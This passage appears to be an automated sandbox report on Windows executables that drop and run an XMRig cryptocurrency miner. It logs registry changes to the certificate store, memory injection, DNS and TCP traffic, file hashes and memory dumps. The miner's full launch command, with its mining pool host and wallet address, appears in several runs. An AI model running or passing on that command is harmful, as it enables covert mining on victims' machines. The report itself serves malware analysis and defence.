| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4964 wrote to memory of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4964 wrote to memory of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3056-16-0x000001A810D40000-0x000001A810D60000-memory.dmp
memory/3056-17-0x000001A810D90000-0x000001A810DB0000-memory.dmp
memory/3056-18-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-19-0x000001A810DB0000-0x000001A810DD0000-memory.dmp
memory/3056-21-0x000001A810DD0000-0x000001A810DF0000-memory.dmp
memory/3056-20-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-22-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-24-0x000001A810DB0000-0x000001A810DD0000-memory.dmp
memory/3056-23-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-25-0x000001A810DD0000-0x000001A810DF0000-memory.dmp
memory/3056-26-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-27-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-28-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-29-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-30-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-31-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-32-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-33-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-34-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-35-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-36-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-37-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-38-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-39-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-40-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-41-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-42-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-43-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-44-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-45-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-46-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-47-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-48-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-49-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-50-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-51-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-52-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-53-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-54-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-55-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-56-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-57-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-58-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-59-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-60-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-61-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-62-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-63-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-64-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-65-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-66-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-67-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-68-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-69-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-70-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-71-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-72-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-73-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-74-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-75-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-76-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-77-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-78-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-79-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-80-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-81-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-82-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-83-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-84-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3772 wrote to memory of 2248 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3772 wrote to memory of 2248 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2248-16-0x000002293A170000-0x000002293A190000-memory.dmp
memory/2248-17-0x000002293A1A0000-0x000002293A1C0000-memory.dmp
memory/2248-18-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-20-0x000002293A1E0000-0x000002293A200000-memory.dmp
memory/2248-19-0x000002293A1C0000-0x000002293A1E0000-memory.dmp
memory/2248-21-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-22-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-24-0x000002293A1C0000-0x000002293A1E0000-memory.dmp
memory/2248-25-0x000002293A1E0000-0x000002293A200000-memory.dmp
memory/2248-23-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-26-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-27-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-28-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-29-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-30-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-31-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-32-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-33-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-34-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-35-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-36-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-37-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-38-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-39-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-40-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-41-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-42-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-43-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-44-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-45-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-46-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-47-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-48-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-49-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-50-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-51-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-52-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-53-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-54-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-55-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-56-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-57-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-58-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-59-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-60-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-61-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-62-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-63-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-64-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-65-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-66-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-67-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-68-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-69-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-70-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-71-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-72-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-73-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-74-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-75-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-76-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-77-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-78-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-79-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-80-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-81-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-82-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-83-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
memory/2248-84-0x00007FF70AD90000-0x00007FF70B893000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc